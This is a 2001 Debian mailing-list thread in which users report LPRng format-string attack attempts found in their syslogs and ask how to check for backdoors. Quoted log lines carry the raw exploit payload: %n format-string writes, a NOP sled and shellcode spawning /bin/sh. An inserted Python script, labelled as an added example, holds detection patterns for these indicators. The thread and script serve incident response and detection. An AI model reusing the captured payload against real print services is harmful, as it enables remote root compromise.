Re: Got hacked by Ramen-style attack

2001-11-22 Thread Jim McCloskey

Thomas Amm <[EMAIL PROTECTED]> wrote:

|> that's what I found in my logs after I had to reboot my 
|> Router, which also worked as print server (Now I know better)
|> because of a DoS.

Exactly the same messages here (in /var/log/sys.log and
/var/log/messages). See my earlier posting:

 To: debian-user@lists.debian.org 
 Subject: LPRNG vulnerability [was Re: weird messages in syslog] 
 From: Jim McCloskey <[EMAIL PROTECTED]> 
 Date: Wed, 21 Nov 2001 10:29:16 -0800 
 CC: debian-security@lists.debian.org 
 References: <[EMAIL PROTECTED]> 

I am using lprng 3.8.0 from Debian testing. I am not running nmbd.
There are no messages in the logs about accepted or refused
connections that seem to be related to the incident.

|> So there are some questions, I would like to pose :
|> Is Woody's lprng still vulnerable ? I've got the latest version.

I think it must be.

|> Is the shown exploit a sign that someone already was in there, or just
|> an attempt?
|> Can I find possible backdoors, or will I have to re-install ?

I also would love answers to these questions. I've not managed to find
any signs of damage so far, and the incident didn't bring the system
down, but I'm very nervous ...

Jim

PS here are the relevant messages:

--
Nov 20 01:18:12 localhost SERVER[21311]: Dispatch_input: bad request line 
'BB??\
??XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\2\
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
.

2201?1?1??F?\200\211?1??f\211?1?\211?C\211]?C\211]?K\211M?\215M??\2001?\211
Nov 20 01:18:13 localhost SERVER[21312]: Dispatch_input: bad request line 
'BB(???)???*?\
??+???XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n\220\220\22\
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2\
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\

repeated then at one second intervals between 01:18:12 and
01:18:47---the same message followed by the same long sequence of
garbage-characters, with a new PID each time.
--
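The entries Jim and Thomas quote share one shape, and a small detector for it is worth more than grepping for "bad request line" by hand. The script below is added here as an example and is not part of the thread: it parses LPRng's syslog entries, flags the format-string indicators (positional `%N$n` writes, `%.Nu` padding, a run of `\220` NOP bytes, an embedded `/bin/sh`), and summarises the one-per-second burst with fresh PIDs that Jim describes. The sample lines are constructed and shortened, and the severity labels are the example's own.

```python
import re
from datetime import datetime

# Constructed sample in the shape of the LPRng syslog entries quoted in the
# thread (shellcode bytes shortened; one harmless and one probe line added).
SAMPLE_LOG = r"""
Nov 20 01:18:12 localhost SERVER[21311]: Dispatch_input: bad request line 'BBXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\220\220\220\220\220/bin/sh'
Nov 20 01:18:13 localhost SERVER[21312]: Dispatch_input: bad request line 'BBXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n\220\220\220\220\220\220\220\220/bin/sh'
Nov 20 01:18:30 localhost SERVER[21340]: Dispatch_input: bad request line 'GET / HTTP/1.0'
Nov 20 01:19:00 localhost SERVER[21341]: Dispatch_input: bad request line '%s%s%s%s%x%x'
"""

SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>\w+)"
    r"\[(?P<pid>\d+)\]: Dispatch_input: bad request line '(?P<req>.*)'$"
)
# "%300$n" is a %n conversion with a positional ("$") argument, i.e. a write to a
# caller-chosen stack slot; the "%.156u" padding before it fixes the number of
# bytes printed so far, which is the value %n stores. Neither belongs in an LPD request.
WRITE_RE = re.compile(r"%\d+\$n")
PAD_RE = re.compile(r"%\.\d+u")
# syslog renders byte 0x90 (x86 NOP) as the octal escape \220; a long run is a NOP sled.
SLED_RE = re.compile(r"(?:\\220){8,}")
ANY_SPEC_RE = re.compile(r"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?[diouxXeEfgGcspn]")

def parse_line(line):
    """Split one syslog line into its fields; None if it is not an LPRng bad-request entry."""
    m = SYSLOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["pid"] = int(ev["pid"])
    ev["time"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")  # syslog carries no year
    return ev

def classify_request(req):
    """Return (severity, reasons) for the payload inside the quotes."""
    reasons = []
    writes = WRITE_RE.findall(req)
    if writes:
        reasons.append(f"{len(writes)} positional %n write(s): {' '.join(writes)}")
    if PAD_RE.search(req):
        reasons.append("precision padding (%.Nu) controlling the written values")
    if SLED_RE.search(req):
        reasons.append("run of \\220 bytes (0x90 NOP sled)")
    if "/bin/sh" in req:
        reasons.append("embedded '/bin/sh' string")
    if writes and len(reasons) >= 2:
        return "critical", reasons          # write primitive plus payload: exploit attempt
    if writes:
        return "high", reasons
    if ANY_SPEC_RE.search(req):
        return "medium", ["printf-style specifiers in an LPD request (format-string probe)"]
    return "info", ["malformed request without format-string indicators"]

def analyze(log_text):
    events = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is not None:
            ev["severity"], ev["reasons"] = classify_request(ev["req"])
            events.append(ev)
    return events

def burst_summary(events, severities=("high", "critical")):
    """Count the flagged entries and their timing, so a one-per-second series with
    a fresh PID each time (as Jim reports) is visible at a glance."""
    hits = [e for e in events if e["severity"] in severities]
    if not hits:
        return {"count": 0}
    times = [e["time"] for e in hits]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return {"count": len(hits), "first": hits[0]["ts"], "last": hits[-1]["ts"],
            "span_seconds": (times[-1] - times[0]).total_seconds(),
            "max_gap_seconds": max(gaps) if gaps else 0.0,
            "pids": [e["pid"] for e in hits]}

if __name__ == "__main__":
    evs = analyze(SAMPLE_LOG)
    for e in evs:
        print(f"{e['ts']} pid={e['pid']} {e['severity']}: {'; '.join(e['reasons'])}")
    print(burst_summary(evs))
```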




Re: Got hacked by Ramen-style attack

2001-11-22 Thread Alvin Oga

hi ya giacomo..

On Thu, 22 Nov 2001, Giacomo Mulas wrote:
> On Thu, 22 Nov 2001, Alvin Oga wrote:
> 
> > they tried doesn't mean they got in
> 
> you are correct so far, but if you read later on, the original poster
> adds:
> 
> > I had a number of rejected packets to port 137 immediately before, nmbd
> > crashed and the lprng exploit started.
> 
> If at least one daemon crashed, the attack may have been successful,
> so he has every reason to be cautious.

yup  but, i'd move the samba server to be internal.. and not
externally visible
- no reason for samba servers to be externally visible

samba ( nmbd/smbd could die for many different reasons )

without knowing the state of the fs before the attack... it's a little
harder to find what's different...
- ie.. run tripwire, checksums, aide, etc

- when checking a possibly infected host, am assuming one uses the binary
  off of a cdrom instead of the (trojaned) machine itself to check its
  binary... which usually returns all okay..even if it's not


fun stuff... to go checking ...
not fun to have to rebuild a new box and very carefully restore data

have fun linux
alvin



Re: Got hacked by Ramen-style attack

2001-11-22 Thread Giacomo Mulas
On Thu, 22 Nov 2001, Alvin Oga wrote:

> they tried doesn't mean they got in

you are correct so far, but if you read later on, the original poster
adds:

> I had a number of rejected packets to port 137 immediately before, nmbd
> crashed and the lprng exploit started.

If at least one daemon crashed, the attack may have been successful,
so he has every reason to be cautious.

Bye
Giacomo

-- 
_

Giacomo Mulas <[EMAIL PROTECTED], [EMAIL PROTECTED]>
_

OSSERVATORIO ASTRONOMICO DI CAGLIARI
Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA)

Tel.: +39 070 71180 216 Fax : +39 070 71180 222
_

"When the storms are raging around you, stay right where you are"
 (Freddy Mercury)
_



Re: Got hacked by Ramen-style attack

2001-11-22 Thread Alvin Oga

hi ya

> > Nov 21 03:29:36 lan1 -- MARK --
> > Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line
> > 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u

they tried doesn't mean they got in

> > I searched the system for fragments of the Ramen worm after reboot but I
> > found nothing suspicious.

how did you check ???

http://www.ists.dartmouth.edu/IRIA/knowledge_base/tools/ramenfind.htm
- lots of tools to check for stuff

to check for other root kits they may have used/hidden/left behind...
http://www.chkrootkit.org
- many other tools ( search for rootkit, trojans, etc.. )

if you re-install without digging deeper...you won't learn anything new ??
if you do dig deeper..maybe you'd find lots of suspicious files???
re-install assumes you patch it up to current levels,
and that your backup data does NOT have any trojans

Debian Security howto
http://www.debian.org/doc/manuals/securing-debian-howto/

c ya
alvin
http://www.Linux-Sec.net .. rest of the hardening howto ..


> > The attack seemed to come over nmbd, although all ports, except inetd, are
> > blocked to the outside via ipchains. I had a number of rejected packets to
> > port 137 immediately before, nmbd crashed and the lprng exploit started.
> > So there are some questions I would like to pose:
> > Is Woody's lprng still vulnerable? I've got the latest version.
> > Is the shown exploit a sign that someone already was in there, or just an
> > attempt?
> > Can I find possible backdoors, or will I have to re-install?
> >



Re: Got hacked by Ramen-style attack

2001-11-22 Thread SaDIKuZboy
try to:
nmap -I -O -P0 127.0.0.1
ps ax
and see if you see something strange
for more help from me just paste tables in an email

note: once i had socklist ... a program that could tell you which programs
keep sockets up
note2: look, no sock open doesn't mean you're without any backdoor ... a sock
can open on an event such as time-trigger or icmp trigger ... so you should
monitor that machine more

SaDIKuZboy
- Original Message -
From: "Thomas Amm" <[EMAIL PROTECTED]>
To: 
Sent: Thursday, November 22, 2001 1:50 PM
Subject: Got hacked by Ramen-style attack


>
> On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:
>
>
> Hi all,
>
> that's what I found in my logs after I had to reboot my
> Router, which also worked as print server (Now I know better)
> because of a DoS.
>
>
> Nov 21 03:29:36 lan1 -- MARK --
> Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line
> 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u
> %303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ
> ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
> Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line
> 'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1
> 92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ
> ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
> Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH
> (and so on) - the lpr.log shows the same entries.
>
> I searched the system for fragments of the Ramen worm after reboot but I
> found nothing suspicious.
> The attack seemed to come over nmbd, although all ports, except inetd, are
> blocked to the outside via ipchains. I had a number of rejected packets to
> port 137 immediately before, nmbd crashed and the lprng exploit started.
> So there are some questions I would like to pose:
> Is Woody's lprng still vulnerable? I've got the latest version.
> Is the shown exploit a sign that someone already was in there, or just an
> attempt?
> Can I find possible backdoors, or will I have to re-install?
>
> Thanks,
>
> --
> Things are more like they are today than they ever were before.
> -- Dwight Eisenhower
>
>



Got hacked by Ramen-style attack

2001-11-22 Thread Thomas Amm

On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:


Hi all,

that's what I found in my logs after I had to reboot my 
Router, which also worked as print server (Now I know better)
because of a DoS.


Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 
'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u
%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ
ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 
'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1
92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ
?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH 
(and so on) - the lpr.log shows the same entries.

I searched the system for fragments of the Ramen worm after reboot but I
found nothing suspicious.
The attack seemed to come over nmbd, although all ports, except inetd, are
blocked to the outside via ipchains. I had a number of rejected packets to
port 137 immediately before, nmbd crashed and the lprng exploit started.
So there are some questions I would like to pose:
Is Woody's lprng still vulnerable? I've got the latest version.
Is the shown exploit a sign that someone already was in there, or just an
attempt?
Can I find possible backdoors, or will I have to re-install?

Thanks,

-- 
Things are more like they are today than they ever were before.
-- Dwight Eisenhower


